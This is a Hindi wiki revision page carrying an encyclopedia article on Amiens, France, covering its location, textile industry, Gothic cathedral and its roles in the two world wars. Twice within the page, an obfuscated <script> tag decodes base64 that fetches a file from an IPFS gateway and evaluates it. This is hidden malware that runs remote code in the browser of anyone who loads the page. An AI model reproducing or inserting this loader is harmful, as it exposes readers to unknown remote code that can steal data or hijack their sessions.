"ऐमिएंस (आम्याँ)" के अवतरणों में अंतर

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ
[अनिरीक्षित अवतरण][अनिरीक्षित अवतरण]
('{{लेख सूचना |पुस्तक नाम=हिन्दी विश्वकोश खण्ड 2 |पृष्ठ स...' के साथ नया पन्ना बनाया)
 
 
पंक्ति १: पंक्ति १:
 +
{{भारतकोश पर बने लेख}}
 
{{लेख सूचना
 
{{लेख सूचना
 
|पुस्तक नाम=हिन्दी विश्वकोश खण्ड 2
 
|पुस्तक नाम=हिन्दी विश्वकोश खण्ड 2

०६:४६, १९ जुलाई २०१८ के समय का अवतरण

चित्र:Tranfer-icon.png यह लेख परिष्कृत रूप में भारतकोश पर बनाया जा चुका है। भारतकोश पर देखने के लिए यहाँ क्लिक करें

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

लेख सूचना
ऐमिएंस (आम्याँ)
पुस्तक नाम हिन्दी विश्वकोश खण्ड 2
पृष्ठ संख्या 279
भाषा हिन्दी देवनागरी
संपादक सुधाकर पाण्डेय
प्रकाशक नागरी प्रचारणी सभा वाराणसी
मुद्रक नागरी मुद्रण वाराणसी
संस्करण सन्‌ 1964 ईसवी
उपलब्ध भारतडिस्कवरी पुस्तकालय
कॉपीराइट सूचना नागरी प्रचारणी सभा वाराणसी
लेख सम्पादक श्यामसुंदर शर्मा

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

ऐमिएंस (आम्याँ) नगर पेरिस से 72 मील उत्तर सॉम, नदी पर स्थित है एवं फ्रांस के सॉम प्रांत की राजधानी है। जनसंख्या 1,17,888 (सन्‌ 1968)। यह व्यापार एवं कलाकौशल का तथा नाविक केंद्र है। यहाँ पर ऊनी, सूती एवं रेशमी वस्त्र, मशीनें, रासायनिक वस्तुएँ, इत्र तथा साजसज्जा के सामान बनते हैं। यहाँ के 'नात्रदेम' गिरजाघर की गणना विश्वप्रसिद्ध गॉथिक वास्तुकला की सर्वोत्कृष्ट कृतियों में की जाती है। दूसरा भव्य स्मारक 'सेंट जरमेन' का गिरजाघर है, जिसका कुछ भाग द्वितीय विश्वयुद्ध में ध्वस्त हो गया। 'होटेल डि विला' 1550 ई में बनना प्रारंभ हुआ। इसी में ऐतिहासिक ऐमिएंस संधि पर हस्ताक्षर हुए थे। यहाँ का पिकार्डी कौतुकालय पुनरुत्थानकालीन वास्तुकला की एक अजर अमर कृति है।

प्रकृति द्वारा सुरक्षित स्थान में बसा हुआ ऐमिएंस नगर अपने आरंभकाल से ही गैलिक अंबियानी जाति का प्रमुख नगर रहा है। 1597 ई. में नगर तथा दुर्ग स्पेन के अधिकार में आ गए, परंतु हेनरी चतुर्थ ने उनपर फिर अधिकार कर लिया।

प्रथम विश्वयुद्ध में ऐमिएंस मित्र राष्ट्रों का प्रमुख पूर्तिस्थल था तथा कनेडियन और आस्ट्रेलियन सेनाओं ने यहीं से विश्वप्रसिद्ध ऐमिएंस अभियान प्रारंभ किया था।

द्वितीय विश्वयुद्ध में यह नात्ज़ियों द्वारा पदाक्रांत हुआ और अगस्त, 1944 ई. तक उनके अधिकार में रहा। अंत में ब्रिटिश सेनाओं ने इसे स्वतंत्र किया।


टीका टिप्पणी और संदर्भ